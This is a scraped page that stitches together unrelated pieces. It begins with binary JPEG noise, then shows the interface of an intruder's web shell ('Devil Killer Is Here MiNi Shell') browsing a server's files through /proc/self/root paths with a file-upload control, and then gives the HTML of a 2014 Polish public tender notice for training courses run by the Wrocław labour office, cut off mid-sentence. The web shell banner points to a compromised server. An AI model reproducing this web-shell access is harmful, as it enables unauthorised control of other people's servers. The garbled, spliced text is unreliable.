JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140319/93292-N-2014.html

<p class="kh_header"><b>Wrocław: Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zorganizowaniu                                                   i przeprowadzeniu szkoleń grupowych, obejmująca dwa zadania:
Zadanie nr 1: Eksploatacja urządzeń i instalacji elektroenergetycznych do 1kV, 
Zadanie nr 2: Prace remontowo-budowlane z podstawami stolarki okiennej i drzwiowej oraz  elementami prowadzenia działalności gospodarczej + 4-tygodniowa praktyka u pracodawcy (w pełnym wymiarze czasu pracy)</b><br>
<b>Numer ogłoszenia: 93292 - 2014; data zamieszczenia: 19.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy we Wrocławiu , ul. Gliniana 20-22, 50-525 Wrocław, woj. dolnośląskie, tel. 71 7701 600, faks 71 7701 633.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> pup.wroclaw.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zorganizowaniu                                                   i przeprowadzeniu szkoleń grupowych, obejmująca dwa zadania:
Zadanie nr 1: Eksploatacja urządzeń i instalacji elektroenergetycznych do 1kV, 
Zadanie nr 2: Prace remontowo-budowlane z podstawami stolarki okiennej i drzwiowej oraz  elementami prowadzenia działalności gospodarczej + 4-tygodniowa praktyka u pracodawcy (w pełnym wymiarze czasu pracy).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zorganizowaniu                                                   i przeprowadzeniu szkoleń grupowych, obejmująca dwa zadania: Zadanie nr 1 Eksploatacja urządzeń i instalacji elektroenergetycznych do 1 kV.  Liczba uczestników szkolenia: maksymalnie 28 osób, nie mniej niż 24 osoby, w 2 grupach liczących po 12-14 osób w grupie. Zadanie nr 2 Prace remontowo-budowlane         z podstawami stolarki okiennej i drzwiowej oraz elementami prowadzenia działalności gospodarczej + 4-tygodniowa praktyka u pracodawcy (w pełnym wymiarze czasu pracy). Liczba uczestników szkolenia: maksymalnie 24 osoby, nie mniej niż 20 osób, w 2 grupach liczących po 10-12 osób w grupie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wpisu do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd	pracy właściwy dla siedziby instytucji szkoleniowej, zgodnie z ustawą z dnia 20 kwietnia 2004r.	o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U. z 2013r., poz. 674 ze 	zmianami) oraz rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r.          	w sprawie rejestru instytucji szkoleniowych (Dz. U. Nr 236, poz. 2365 z późn. zm.); warunek	ten zostanie spełniony, jeżeli instytucja szkoleniowa złoży wraz z ofertą stosowne oświadczenie          	o posiadaniu aktualnego wpisu do Rejestru Instytucji Szkoleniowych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat	przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -	 	w tym okresie, wykonał z należytą starannością:

       -	dla Zadania nr 1: co najmniej 2 szkolenia grupowe dla łącznie minimum 20 osób o tematyce	odpowiadającej przedmiotowi zamówienia, z podaniem ich wartości, przedmiotu, dat	wykonania i podmiotów, na rzecz których usługi zostały wykonane;

      -   dla Zadania nr 2:  co najmniej 2 szkolenia grupowe dla łącznie minimum 20 osób o tematyce	odpowiadającej przedmiotowi zamówienia tj. z zakresu prac remontowo - budowlanych                	z montażem stolarki okiennej i drzwiowej, z podaniem ich wartości, przedmiotu, dat	wykonania i podmiotów, na rzecz których usługi zostały wykonane. W przypadku, gdy	Wykonawca nie wykonał co najmniej 2 szkoleń grupowych z zakresu obejmującego prace	remontowo-budowlane z montażem stolarki okiennej i drzwiowej, Zamawiający dopuszcza	możliwość wykazania wykonania łącznie co najmniej 4 szkoleń grupowych dla łącznie minimum 	40 osób o tematyce odpowiadającej przedmiotowi zamówienia, tj. co najmniej 2 szkoleń	grupowych z zakresu prac remontowo-budowlanych dla minimum 20 osób i co najmniej 2	szkoleń grupowych z zakresu montażu stolarki okiennej i drzwiowej dla minimum 20 osób,           	z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi 	zostały	wykonane.

	Dotyczy wszystkich zadań:
	Zamawiający przez szkolenie grupowe rozumie minimum 10 osób szkolących się w tym samym	miejscu i w tym samym czasie tj. na tych samych zajęciach.
	Wykonawca musi udokumentować, że wymienione w wykazie zrealizowanych szkoleń	grupowych, stanowiącym Załącznik nr 4 do SIWZ, usługi zostały należycie wykonane	załączając dowody tj. poświadczenia potwierdzające, że każde ze zrealizowanych szkoleń	zostało wykonane należycie (zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19	lutego 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od	wykonawcy, oraz form w jakich te dokumenty mogą być składane  - Dz. U. z 2013r., poz.	231).
	Wykonawca jest zobowiązany dołączyć do wykazu wykonanych usług oprócz poświadczeń	również inne dokumenty lub informacje przedstawiające zakres tematyczny zrealizowanych	szkoleń, jeżeli nie wynika to jednoznacznie z nazwy poszczególnego szkolenia, wskazanego           	w wykazie lub z dołączonych poświadczeń, potwierdzających należyte wykonanie usługi.

	Uwaga: Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie	jest w stanie uzyskać poświadczenia może przedłożyć oświadczenie. Wykonawca musi wykazać 	istnienie obiektywnej przyczyny niemożności uzyskania poświadczenia, o którym mowa wyżej;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia	będzie dysponował:

       -  dla Zadania nr 1: co najmniej 1 salą przystosowaną do przeprowadzenia zajęć teoretycznych	i praktycznych. W ramach zajęć praktycznych dla każdego uczestnika	szkolenia muszą być	zapewnione odpowiednie materiały tj. kable i przewody różnego rodzaju, gniazdka,	wyłączniki, dzwonki, bezpieczniki itp.;

       -  dla Zadania nr 2: co najmniej 1 salą przystosowaną do przeprowadzenia zajęć teoretycznych         	i co najmniej 1 pomieszczeniem przystosowanym do przeprowadzenia zajęć praktycznych.	Do zajęć praktycznych, należy zapewnić co najmniej jedno pomieszczenie o powierzchni min.	50m2 spełniające warunki zgodne z przepisami dotyczącymi bezpieczeństwa i higieny pracy	oraz ochrony przeciwpożarowej, niezbędne materiały budowlane, sprawny sprzęt, maszyny             	i narzędzia w ilości i jakości koniecznej do prawidłowego wykonania tej części szkolenia (w tym 	farby, płytki ścienne i podłogowe, gładź szpachlowa, cement, żwir, kleje do płytek, płyty g-k,	pędzle,	wałki, packi, kielnie, poziomice, mieszadła wolnoobrotowe, wiertarki udarowe, piły	elektryczne do cięcia płyt, klucze sanitarne, okna, drzwi itp.) oraz inne potrzebne zdaniem	Wykonawcy materiały i narzędzia, w ilości niezbędnej do prawidłowego przeprowadzenia	szkolenia dla całej grupy uczestników szkolenia. Każdy  uczestnik  szkolenia  musi  mieć	swobodny  dostęp i możliwość  wykorzystania  i  pracy  na  każdego rodzaju sprzęcie,	maszynach, narzędziach i materiałach, zapewnionych do przeprowadzenia zajęć praktycznych.	W ramach realizowanego zamówienia Wykonawca musi zapewnić dla wszystkich uczestników	szkolenia miejsca praktyk u pracodawców. W oświadczeniu dotyczącym organizacji miejsc	praktyk u pracodawców, którego wzór stanowi Załącznik nr 12 do SIWZ Wykonawca musi	wskazać nazwy i adresy pracodawców u których będą realizowane praktyki. Wykonawca winien 	wskazać w ofercie co najmniej trzech pracodawców. Wykonawca musi wskazać tylko takich	pracodawców, którzy zapewnią każdemu przyjętemu na praktykę uczestnikowi szkolenia	odpowiednie stanowisko pracy. Praktyka musi być realizowana w warunkach rzeczywistych.	Wraz z w/w wykazem miejsc praktyk do oferty muszą być załączone oryginały oświadczeń	każdego z pracodawców zobowiązujących się do przyjęcia na praktykę dokładnie określonej	liczby uczestników szkolenia.

Dotyczy wszystkich zadań: 
Sale szkoleniowe muszą być przestronne, jasno oświetlone, dostosowane do liczby uczestników szkolenia, spełniać warunki zgodne z przepisami dotyczącymi bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej, zawierać osobne miejsca do siedzenia dla każdego uczestnika szkolenia umożliwiające swobodne sporządzanie notatek (stolik, ławka, krzesło z przystawką) oraz muszą być wyposażone w sprzęt techniczny niezbędny do sprawnego prowadzenia zajęć (tj. tablica, rzutnik, flipchart, drukarka, itp.). W budynku, w którym odbywają się zajęcia  zapewniony musi być dostęp do pomieszczeń sanitarnych (w tym dostęp do WC zaopatrzonego w środki higieniczne) oraz do zaplecza socjalnego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia	będzie dysponował,kadrą dydaktyczną składającą się z:

-   dla Zadania nr 1:
a) co najmniej dwóch osób do prowadzenia zajęć związanych z eksploatacją urządzeń, instalacji i sieci, z których każda osoba musi posiadać wykształcenie minimum średnie elektryczne i doświadczenie w przeprowadzeniu co najmniej 2 szkoleń grupowych dla łącznie minimum 20 osób w zakresie tematycznym odpowiadającym zakresowi prowadzonych zajęć, zdobyte w okresie 3 ostatnich lat przed upływem terminu składania ofert. W przypadku nauczycieli za doświadczenie uznaje się posiadanie rocznego stażu pracy dydaktycznej związanej z zakresem prowadzonych zajęć, zdobytego w okresie 3 ostatnich lat przed upływem terminu składania ofert,
b) co najmniej jednej osoby do prowadzenia zajęć związanych z udzielaniem pierwszej pomocy będącej zgodnie z obowiązującymi przepisami (Ustawa z dnia 8 września 2006r.                        o Państwowym	Ratownictwie Medycznym - Dz. U. z 2006r. Nr 191 poz. 1410 z późn. zm.):  lekarzem lub pielęgniarką lub ratownikiem medycznym lub nauczycielem posiadającymi odpowiednie przygotowanie oraz doświadczenie w przeprowadzeniu co najmniej 2 szkoleń grupowych dla łącznie minimum 20 osób w zakresie udzielania pierwszej pomocy, zdobyte           w okresie 3 ostatnich lat przed upływem terminu składania ofert lub posiada roczny staż pracy jako lekarz, pielęgniarka, ratownik medyczny, zdobyty w okresie 3 ostatnich lat przed upływem terminu składania ofert,
c) co najmniej jednej osoby do prowadzenia zajęć z zakresu bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej, która posiada wykształcenie co najmniej średnie, uprawnienia w zakresie bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej i doświadczenie            w przeprowadzeniu co najmniej 2 szkoleń grupowych dla łącznie minimum 20 osób w zakresie tematycznym odpowiadającym zakresowi prowadzonych zajęć, zdobyte w okresie 3 ostatnich lat przed upływem terminu składania ofert;

      -    dla Zadania nr 2: 
	a) co najmniej dwóch osób do prowadzenia zajęć teoretycznych i praktycznych z modułu I	(Prace remontowo-budowlane) i z Modułu II (Stolarka okienna i drzwiowa), z których każda	osoba musi posiadać wykształcenie budowlane i uprawnienia budowlane oraz doświadczenie      	w przeprowadzeniu co najmniej 2 szkoleń grupowych dla łącznie minimum 20 osób w zakresie	tematycznym odpowiadającym zakresowi prowadzonych zajęć, zdobyte w okresie 3 ostatnich	lat przed upływem terminu składania ofert. W przypadku nauczycieli za doświadczenie uznaje	się posiadanie rocznego stażu pracy dydaktycznej związanej z zakresem prowadzonych zajęć,	zdobytego w okresie 3 ostatnich lat przed upływem terminu składania ofert,
	b) co najmniej jednej osoby do prowadzenia zajęć z modułu III (Podstawy przedsiębiorczości),	która musi posiadać wykształcenie wyższe i doświadczenie w przeprowadzeniu co najmniej 2	szkoleń grupowych dla łącznie minimum 20 osób w zakresie tematycznym odpowiadającym	zakresowi prowadzonych zajęć, zdobyte w okresie 3 ostatnich lat przed upływem terminu	składania ofert,
c) co najmniej jednej osoby do prowadzenia zajęć związanych z udzielaniem pierwszej pomocy będącej zgodnie z obowiązującymi przepisami (Ustawa z dnia 8 września 2006r.                        o Państwowym	Ratownictwie Medycznym - Dz. U. z 2006r. Nr 191 poz. 1410 z późn. zm.):  lekarzem lub pielęgniarką lub ratownikiem medycznym lub nauczycielem posiadającymi odpowiednie przygotowanie oraz doświadczenie w przeprowadzeniu co najmniej 2 szkoleń grupowych dla łącznie minimum 20 osób w zakresie udzielania pierwszej pomocy, zdobyte           w okresie 3 ostatnich lat przed upływem terminu składania ofert lub posiada roczny staż pracy jako lekarz, pielęgniarka, ratownik medyczny, zdobyty w okresie 3 ostatnich lat przed upływem terminu składania ofert,
d) co najmniej jednej osoby do prowadzenia zajęć z zakresu bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej, która posiada wykształcenie co najmniej średnie, uprawnienia w zakresie bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej i doświadczenie            w przeprowadzeniu co najmniej 2 szkoleń grupowych dla łącznie minimum 20 osób w zakresie tematycznym odpowiadającym zakresowi prowadzonych zajęć, zdobyte w okresie 3 ostatnich lat przed upływem terminu składania ofert;
	e) opiekunów uczestników praktyk realizowanych u pracodawców;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Wypełniony Formularz oferty, do każdego zadania osobny, stanowiący odpowiednio do danego zadania Załącznik nr 2a do SIWZ i Załącznik nr 2b do SIWZ.
2. Program szkolenia przygotowany przez Wykonawcę i opracowany zgodnie z § 75 ust. 4 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów           i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177, poz. 1193 z późn. zm.) zgodnie                      z Załącznikiem nr 3a do SIWZ (dla Zadania nr 1) i Załącznikiem nr 3b do SIWZ (dla Zadania nr 2).
3. Wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i nabycie umiejętności  opracowany zgodnie z wymaganiami określonymi w § 75 ust. 3 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177, poz. 1193 z późn. zm.). W przypadku wydania zaświadczenia zgodnego ze wzorem określonym w § 18 ust. 2 rozporządzenia Ministra Edukacji Narodowej z dn. 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012r., poz. 186 z późn. zm.) należy dołączyć do zaświadczenia suplement zawierający następujące informacje: okres trwania szkolenia, tematy i wymiar godzin zajęć edukacyjnych oraz numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, wraz z podpisem osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie - dla Zadania nr 2.
4. Wzór świadectwa kwalifikacyjnego uprawniającego do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji, stanowiącego załącznik do rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 141, poz. 1189) - dla Zadania nr 1.
5. Oświadczenie o dysponowaniu przez Wykonawcę Komisją Kwalifikacyjną powołaną zgodnie                z obowiązującymi przepisami, niezbędną do przeprowadzenia egzaminu państwowego na uprawnienia w zakresie eksploatacji wybranych urządzeń i instalacji elektroenergetycznych o napięciu do 1 kV - dla Zadania nr 1.
6. Oświadczenie dotyczące organizacji miejsc praktyk u pracodawców wraz z oryginałami oświadczeń każdego z pracodawców zobowiązujących się do przyjęcia na praktykę uczestników szkolenia, według wzoru stanowiącego Załącznik nr 12 do SIWZ - dla Zadania nr 2.
7. Pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie w sytuacji, gdy Wykonawca składa ofertę przez ustanowionego pełnomocnika. Pełnomocnictwo musi zawierać wskazanie ustanowionego pełnomocnika oraz zakres jego umocowania.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian postanowień zawartych w umowie w przypadkach:
1) zmiany osób prowadzących zajęcia na szkoleniu oraz opiekunów uczestników praktyk. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach (np. choroba, zgon, lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Wykonawca może dokonać wymiany osób wskazanych do wykonania przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując osobę/y o co najmniej równych kwalifikacjach i doświadczeniu. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z wymiany osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia. Zamawiający może żądać od Wykonawcy zmiany osób przewidzianych do realizacji szkolenia, jeżeli uzna, że osoby te nienależycie wykonują swoje obowiązki. W takiej sytuacji Zamawiający pisemnie przedstawi powody, dla których żąda zmiany osób realizujących zamówienie i wskaże termin, w jakim Wykonawca zobowiązany będzie wskazać nowe osoby spełniające wymogi 